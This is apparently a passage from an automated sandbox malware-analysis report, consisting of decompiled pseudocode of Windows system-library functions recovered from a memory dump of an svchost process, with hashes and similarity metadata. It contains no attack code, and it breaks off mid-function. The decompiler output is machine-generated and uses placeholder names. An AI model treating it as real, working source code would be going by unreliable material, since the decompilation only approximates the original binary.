                                          							_t109 = L03A44620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                          							if(_t109 == 0) {
                                          								_t108 = 0xc0000017;
                                          								goto L10;
                                          							} else {
                                          								_t21 = _t109 + 0x18; // 0x18
                                          								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                          								 *_t109 = 1;
                                          								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                          								 *(_t109 + 0xe) = _t82;
                                          								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                          								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                          								E03A6F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                          								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          								 *((short*)(_t109 + 0xc)) =  *_t103;
                                          								_t91 =  *_t103 & 0x0000ffff;
                                          								_t100 = _t91 & 0xfffffffe;
                                          								_t84 = 0x5c;
                                          								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                          									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                          										_push(_v60);
                                          										E03A695D0();
                                          										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                          										_t51 = 0xc0000106;
                                          									} else {
                                          										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                          										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                          										goto L5;
                                          									}
                                          								} else {
                                          									L5:
                                          									 *_a4 = _t109;
                                          									_t51 = 0;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t51;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 23c355b28d2ce5f1a9dbbdf130322ce496eb735bf056d547cb6e2b5a58ecfc97
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 41516C755047109FD320DF59C940A6BBBF8FF88750F00892EFA959B690E7B4E914CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E03AA3540(intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				char _v352;
                                          				char _v1072;
                                          				intOrPtr _v1140;
                                          				intOrPtr _v1148;
                                          				char _v1152;
                                          				char _v1156;
                                          				char _v1160;
                                          				char _v1164;
                                          				char _v1168;
                                          				char* _v1172;
                                          				short _v1174;
                                          				char _v1176;
                                          				char _v1180;
                                          				char _v1192;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				short _t41;
                                          				short _t42;
                                          				intOrPtr _t80;
                                          				intOrPtr _t81;
                                          				signed int _t82;
                                          				void* _t83;
                                          
                                          				_v12 =  *0x3b1d360 ^ _t82;
                                          				_t41 = 0x14;
                                          				_v1176 = _t41;
                                          				_t42 = 0x16;
                                          				_v1174 = _t42;
                                          				_v1164 = 0x100;
                                          				_v1172 = L"BinaryHash";
                                          				_t81 = E03A60BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                          				if(_t81 < 0) {
                                          					L11:
                                          					_t75 = _t81;
                                          					E03AA3706(0, _t81, _t79, _t80);
                                          					L12:
                                          					if(_a4 != 0xc000047f) {
                                          						E03A6FA60( &_v1152, 0, 0x50);
                                          						_v1152 = 0x60c201e;
                                          						_v1148 = 1;
                                          						_v1140 = E03AA3540;
                                          						E03A6FA60( &_v1072, 0, 0x2cc);
                                          						_push( &_v1072);
                                          						E03A7DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                          						E03AB0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                          						_push(_v1152);
                                          						_push(0xffffffff);
                                          						E03A697C0();
                                          					}
                                          					return E03A6B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                          				}
                                          				_t79 =  &_v352;
                                          				_t81 = E03AA3971(0, _a4,  &_v352,  &_v1156);
                                          				if(_t81 < 0) {
                                          					goto L11;
                                          				}
                                          				_t75 = _v1156;
                                          				_t79 =  &_v1160;
                                          				_t81 = E03AA3884(_v1156,  &_v1160,  &_v1168);
                                          				if(_t81 >= 0) {
                                          					_t80 = _v1160;
                                          					E03A6FA60( &_v96, 0, 0x50);
                                          					_t83 = _t83 + 0xc;
                                          					_push( &_v1180);
                                          					_push(0x50);
                                          					_push( &_v96);
                                          					_push(2);
                                          					_push( &_v1176);
                                          					_push(_v1156);
                                          					_t81 = E03A69650();
                                          					if(_t81 >= 0) {
                                          						if(_v92 != 3 || _v88 == 0) {
                                          							_t81 = 0xc000090b;
                                          						}
                                          						if(_t81 >= 0) {
                                          							_t75 = _a4;
                                          							_t79 =  &_v352;
                                          							E03AA3787(_a4,  &_v352, _t80);
                                          						}
                                          					}
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                          				}
                                          				_push(_v1156);
                                          				E03A695D0();
                                          				if(_t81 >= 0) {
                                          					goto L12;
                                          				} else {
                                          					goto L11;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 62ec7c7f5010b7f1181a5bae286f4decbd5b89a60cb2acbec0276c2bacd47ca2
                                          • Instruction ID: 0485301f164975da012c6bd4607605a64ab84daf3c6927deac170a9fe95b07d6
                                          • Opcode Fuzzy Hash: 62ec7c7f5010b7f1181a5bae286f4decbd5b89a60cb2acbec0276c2bacd47ca2
                                          • Instruction Fuzzy Hash: 704147B6D0062C9BDF21DA54CD80FEFB77CAB44714F0045E6E609AB280DB349E888F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E03AF05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				char _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				void* __ebx;
                                          				void* _t35;
                                          				signed int _t42;
                                          				char* _t48;
                                          				signed int _t59;
                                          				signed char _t61;
                                          				signed int* _t79;
                                          				void* _t88;
                                          
                                          				_v28 = __edx;
                                          				_t79 = __ecx;
                                          				if(E03AF07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                          					L13:
                                          					_t35 = 0;
                                          					L14:
                                          					return _t35;
                                          				}
                                          				_t61 = __ecx[1];
                                          				_t59 = __ecx[0xf];
                                          				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                          				_v36 = _a8 << 0xc;
                                          				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                          				asm("sbb esi, esi");
                                          				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                          				if(_t42 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t59);
                                          					_push(0xffffffff);
                                          					if(E03A69730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                          						_push(_t61);
                                          						E03AEA80D(_t59, 1, _v20, 0);
                                          						_t88 = 4;
                                          					}
                                          				}
                                          				_t35 = E03AEA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                          				if(_t35 < 0) {
                                          					goto L14;
                                          				}
                                          				E03AF1293(_t79, _v40, E03AF07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                          				if(E03A47D50() == 0) {
                                          					_t48 = 0x7ffe0380;
                                          				} else {
                                          					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          					E03AE138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                          				}
                                          				goto L13;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: 21fa03d2f02645f3f0f087e5f316a3e5e0658a634f9f8160055729c121b6d63d
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: 8E31C032704345AFE720DF64CD85F9BB799AB84754F08422AFA589B281E7B4E904CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E03AA3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				char* _v20;
                                          				short _v22;
                                          				char _v24;
                                          				intOrPtr _t38;
                                          				short _t40;
                                          				short _t41;
                                          				void* _t44;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          
                                          				_v16 = __edx;
                                          				_t40 = 0x14;
                                          				_v24 = _t40;
                                          				_t41 = 0x16;
                                          				_v22 = _t41;
                                          				_t38 = 0;
                                          				_v12 = __ecx;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(2);
                                          				_t43 =  &_v24;
                                          				_v20 = L"BinaryName";
                                          				_push( &_v24);
                                          				_push(__ecx);
                                          				_t47 = 0;
                                          				_t48 = E03A69650();
                                          				if(_t48 >= 0) {
                                          					_t48 = 0xc000090b;
                                          				}
                                          				if(_t48 != 0xc0000023) {
                                          					_t44 = 0;
                                          					L13:
                                          					if(_t48 < 0) {
                                          						L16:
                                          						if(_t47 != 0) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                          						}
                                          						L18:
                                          						return _t48;
                                          					}
                                          					 *_v16 = _t38;
                                          					 *_a4 = _t47;
                                          					goto L18;
                                          				}
                                          				_t47 = L03A44620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                          				if(_t47 != 0) {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t47);
                                          					_push(2);
                                          					_push( &_v24);
                                          					_push(_v12);
                                          					_t48 = E03A69650();
                                          					if(_t48 < 0) {
                                          						_t44 = 0;
                                          						goto L16;
                                          					}
                                          					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                          						_t48 = 0xc000090b;
                                          					}
                                          					_t44 = 0;
                                          					if(_t48 < 0) {
                                          						goto L16;
                                          					} else {
                                          						_t17 = _t47 + 0xc; // 0xc
                                          						_t38 = _t17;
                                          						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                          							_t48 = 0xc000090b;
                                          						}
                                          						goto L13;
                                          					}
                                          				}
                                          				_t48 = _t48 + 0xfffffff4;
                                          				goto L18;
                                          			}















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 65c2badc550b999b0cbe5fd0335f25f6908f11c458ed8604ade25b45246b4336
                                          • Instruction ID: 60ad0626197777a8e315e1a5fdb6344fc4612975e96deb68d1ed45159cfce006
                                          • Opcode Fuzzy Hash: 65c2badc550b999b0cbe5fd0335f25f6908f11c458ed8604ade25b45246b4336
                                          • Instruction Fuzzy Hash: B731FF3B905A0AAFEF15DB5DC955E6BF778EB80B20F01416EE914AB380D7309E04C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 33%
                                          			E03A5D294(void* __ecx, char __edx, void* __eflags) {
                                          				signed int _v8;
                                          				char _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				intOrPtr _v64;
                                          				char* _v68;
                                          				intOrPtr _v72;
                                          				char _v76;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				char _v92;
                                          				intOrPtr _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t35;
                                          				char _t38;
                                          				signed int _t40;
                                          				signed int _t44;
                                          				signed int _t52;
                                          				void* _t53;
                                          				void* _t55;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t64;
                                          				signed int _t65;
                                          				signed int _t66;
                                          
                                          				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0x3b1d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                          				_v105 = __edx;
                                          				_push( &_v92);
                                          				_t52 = 0;
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v104);
                                          				_push(0);
                                          				_t59 = __ecx;
                                          				_t55 = 2;
                                          				if(E03A44120(_t55, __ecx) < 0) {
                                          					_t35 = 0;
                                          					L8:
                                          					_pop(_t61);
                                          					_pop(_t64);
                                          					_pop(_t53);
                                          					return E03A6B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                          				}
                                          				_v96 = _v100;
                                          				_t38 = _v92;
                                          				if(_t38 != 0) {
                                          					_v104 = _t38;
                                          					_v100 = _v88;
                                          					_t40 = _v84;
                                          				} else {
                                          					_t40 = 0;
                                          				}
                                          				_v72 = _t40;
                                          				_v68 =  &_v104;
                                          				_push( &_v52);
                                          				_v76 = 0x18;
                                          				_push( &_v76);
                                          				_v64 = 0x40;
                                          				_v60 = _t52;
                                          				_v56 = _t52;
                                          				_t44 = E03A698D0();
                                          				_t62 = _v88;
                                          				_t65 = _t44;
                                          				if(_t62 != 0) {
                                          					asm("lock xadd [edi], eax");
                                          					if((_t44 | 0xffffffff) != 0) {
                                          						goto L4;
                                          					}
                                          					_push( *((intOrPtr*)(_t62 + 4)));
                                          					E03A695D0();
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                          					goto L4;
                                          				} else {
                                          					L4:
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                          					if(_t65 >= 0) {
                                          						_t52 = 1;
                                          					} else {
                                          						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                          							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                          						}
                                          					}
                                          					_t35 = _t52;
                                          					goto L8;
                                          				}
                                          			}

































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: c19a3620e171741a8317b08af40d4858b7c55d50e6bec30431d63ca526dd8805
                                          • Instruction ID: f2ec9f46063961ab4a913edf97d81a31097a319ebcd5c796d36c8f843aa2ff1a
                                          • Opcode Fuzzy Hash: c19a3620e171741a8317b08af40d4858b7c55d50e6bec30431d63ca526dd8805
                                          • Instruction Fuzzy Hash: A231ADB5509305AFC710DF28C980A6BBBF8EB99664F04092FF99497210E735DD08CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E03A31B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                          				intOrPtr _v8;
                                          				char _v16;
                                          				intOrPtr* _t26;
                                          				intOrPtr _t29;
                                          				void* _t30;
                                          				signed int _t31;
                                          
                                          				_t27 = __ecx;
                                          				_t29 = __edx;
                                          				_t31 = 0;
                                          				_v8 = __edx;
                                          				if(__edx == 0) {
                                          					L18:
                                          					_t30 = 0xc000000d;
                                          					goto L12;
                                          				} else {
                                          					_t26 = _a4;
                                          					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                          						goto L18;
                                          					} else {
                                          						E03A6BB40(__ecx,  &_v16, __ecx);
                                          						_push(_t26);
                                          						_push(0);
                                          						_push(0);
                                          						_push(_t29);
                                          						_push( &_v16);
                                          						_t30 = E03A6A9B0();
                                          						if(_t30 >= 0) {
                                          							_t19 =  *_t26;
                                          							if( *_t26 != 0) {
                                          								goto L7;
                                          							} else {
                                          								 *_a8 =  *_a8 & 0;
                                          							}
                                          						} else {
                                          							if(_t30 != 0xc0000023) {
                                          								L9:
                                          								_push(_t26);
                                          								_push( *_t26);
                                          								_push(_t31);
                                          								_push(_v8);
                                          								_push( &_v16);
                                          								_t30 = E03A6A9B0();
                                          								if(_t30 < 0) {
                                          									L12:
                                          									if(_t31 != 0) {
                                          										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                          									}
                                          								} else {
                                          									 *_a8 = _t31;
                                          								}
                                          							} else {
                                          								_t19 =  *_t26;
                                          								if( *_t26 == 0) {
                                          									_t31 = 0;
                                          								} else {
                                          									L7:
                                          									_t31 = L03A44620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                          								}
                                          								if(_t31 == 0) {
                                          									_t30 = 0xc0000017;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t30;
                                          			}









                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: a66889b2268123072e7c3323170c794e84955dbbcd829fd308e76cbb18942bde
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: 7121F277500228ABCB21FB55C944F6BF7BDAF82B50F29486BF9149B200D635DC0197B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E03A4F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                          				intOrPtr _t13;
                                          				intOrPtr _t14;
                                          				signed int _t16;
                                          				signed char _t17;
                                          				intOrPtr _t19;
                                          				intOrPtr _t21;
                                          				intOrPtr _t23;
                                          				intOrPtr* _t25;
                                          
                                          				_t25 = _a8;
                                          				_t17 = __ecx;
                                          				if(_t25 == 0) {
                                          					_t19 = 0xc00000f2;
                                          					L8:
                                          					return _t19;
                                          				}
                                          				if((__ecx & 0xfffffffe) != 0) {
                                          					_t19 = 0xc00000ef;
                                          					goto L8;
                                          				}
                                          				_t19 = 0;
                                          				 *_t25 = 0;
                                          				_t21 = 0;
                                          				_t23 = "Actx ";
                                          				if(__edx != 0) {
                                          					if(__edx == 0xfffffffc) {
                                          						L21:
                                          						_t21 = 0x200;
                                          						L5:
                                          						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                          						 *_t25 = _t13;
                                          						L6:
                                          						if(_t13 == 0) {
                                          							if((_t17 & 0x00000001) != 0) {
                                          								 *_t25 = _t23;
                                          							}
                                          						}
                                          						L7:
                                          						goto L8;
                                          					}
                                          					if(__edx == 0xfffffffd) {
                                          						 *_t25 = _t23;
                                          						_t13 = _t23;
                                          						goto L6;
                                          					}
                                          					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                          					 *_t25 = _t13;
                                          					L14:
                                          					if(_t21 == 0) {
                                          						goto L6;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t14 = _a4;
                                          				if(_t14 != 0) {
                                          					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                          					if(_t16 <= 1) {
                                          						_t21 = 0x1f8;
                                          						_t13 = 0;
                                          						goto L14;
                                          					}
                                          					if(_t16 == 2) {
                                          						goto L21;
                                          					}
                                          					if(_t16 != 4) {
                                          						_t19 = 0xc00000f0;
                                          						goto L7;
                                          					}
                                          					_t13 = 0;
                                          					goto L6;
                                          				} else {
                                          					_t21 = 0x1f8;
                                          					goto L5;
                                          				}
                                          			}











                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 2542933cdc5e019ba3001bb843b357783b47b8c01980fc71e4b78d7f9e6cdb0a
                                          • Instruction ID: 6ffa3b9e9827da9d5a8c250f1ff5cbaebf7289310557997f953d6e7c76dfdb10
                                          • Opcode Fuzzy Hash: 2542933cdc5e019ba3001bb843b357783b47b8c01980fc71e4b78d7f9e6cdb0a
                                          • Instruction Fuzzy Hash: 28119035B446028FFB24CF1D8B90736B2E9ABC7624F28652FE461CB791DA78C8418740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E03AD8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				void* _t41;
                                          
                                          				_t40 = __esi;
                                          				_t39 = __edi;
                                          				_t38 = __edx;
                                          				_t35 = __ecx;
                                          				_t34 = __ebx;
                                          				_push(0x74);
                                          				_push(0x3b00d50);
                                          				E03A7D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                          				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                          					E03AB5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                          					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                          						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                          						asm("int3");
                                          						 *(_t41 - 4) = 0xfffffffe;
                                          					}
                                          				}
                                          				 *(_t41 - 4) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                          				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                          				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                          				 *((intOrPtr*)(_t41 - 0x64)) = L03A7DEF0;
                                          				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                          				_push(_t41 - 0x70);
                                          				L03A7DEF0(1, _t38);
                                          				 *(_t41 - 4) = 0xfffffffe;
                                          				return E03A7D130(_t34, _t39, _t40);
                                          			}






                                          Strings
                                          • Critical error detected %lx, xrefs: 03AD8E21
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: ac862dab6ab1d342da2f0e264a05dabd3f9fe030ec2b4538cff0ffb54a6dc570
                                          • Instruction ID: 1d28d295424d41f887b321819427d9f37fbbcfe346b362f5f9778a058bbf7169
                                          • Opcode Fuzzy Hash: ac862dab6ab1d342da2f0e264a05dabd3f9fe030ec2b4538cff0ffb54a6dc570
                                          • Instruction Fuzzy Hash: 52113575D14348EADB25DFA88A4579CBBB8BF05714F24426ED42AAB392C7388602CF15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 03ABFF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: f936322fe0b26fe04ee5816e678b1983bc6b40efb650837b68bdf48674e3a397
                                          • Instruction ID: e4f20b63137784661945e9ca230de8bff311838e565ca5c343db7b5cb527c8ce
                                          • Opcode Fuzzy Hash: f936322fe0b26fe04ee5816e678b1983bc6b40efb650837b68bdf48674e3a397
                                          • Instruction Fuzzy Hash: D6110475910244EFCB22EF60CE49FD8BBB5FF09704F18805AE0056B6A2C7399950CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E03AF5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t296;
                                          				signed char _t298;
                                          				signed int _t301;
                                          				signed int _t306;
                                          				signed int _t310;
                                          				signed char _t311;
                                          				intOrPtr _t312;
                                          				signed int _t313;
                                          				void* _t327;
                                          				signed int _t328;
                                          				intOrPtr _t329;
                                          				intOrPtr _t333;
                                          				signed char _t334;
                                          				signed int _t336;
                                          				void* _t339;
                                          				signed int _t340;
                                          				signed int _t356;
                                          				signed int _t362;
                                          				short _t367;
                                          				short _t368;
                                          				short _t373;
                                          				signed int _t380;
                                          				void* _t382;
                                          				short _t385;
                                          				signed short _t392;
                                          				signed char _t393;
                                          				signed int _t395;
                                          				signed char _t397;
                                          				signed int _t398;
                                          				signed short _t402;
                                          				void* _t406;
                                          				signed int _t412;
                                          				signed char _t414;
                                          				signed short _t416;
                                          				signed int _t421;
                                          				signed char _t427;
                                          				intOrPtr _t434;
                                          				signed char _t435;
                                          				signed int _t436;
                                          				signed int _t442;
                                          				signed int _t446;
                                          				signed int _t447;
                                          				signed int _t451;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				intOrPtr _t456;
                                          				intOrPtr* _t457;
                                          				short _t458;
                                          				signed short _t462;
                                          				signed int _t469;
                                          				intOrPtr* _t474;
                                          				signed int _t475;
                                          				signed int _t479;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				short _t485;
                                          				signed int _t491;
                                          				signed int* _t494;
                                          				signed int _t498;
                                          				signed int _t505;
                                          				intOrPtr _t506;
                                          				signed short _t508;
                                          				signed int _t511;
                                          				void* _t517;
                                          				signed int _t519;
                                          				signed int _t522;
                                          				void* _t523;
                                          				signed int _t524;
                                          				void* _t528;
                                          				signed int _t529;
                                          
                                          				_push(0xd4);
                                          				_push(0x3b01178);
                                          				E03A7D0E8(__ebx, __edi, __esi);
                                          				_t494 = __edx;
                                          				 *(_t528 - 0xcc) = __edx;
                                          				_t511 = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                          				 *(_t528 - 0xbc) = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                          				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                          				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                          				_t427 = 0;
                                          				 *(_t528 - 0x74) = 0;
                                          				 *(_t528 - 0x9c) = 0;
                                          				 *(_t528 - 0x84) = 0;
                                          				 *(_t528 - 0xac) = 0;
                                          				 *(_t528 - 0x88) = 0;
                                          				 *(_t528 - 0xa8) = 0;
                                          				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                          				if( *(_t528 + 0x1c) <= 0x80) {
                                          					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                          					if(__eflags != 0) {
                                          						_t421 = E03AF4C56(0, __edx, __ecx, __eflags);
                                          						__eflags = _t421;
                                          						if(_t421 != 0) {
                                          							 *((intOrPtr*)(_t528 - 4)) = 0;
                                          							E03A6D000(0x410);
                                          							 *(_t528 - 0x18) = _t529;
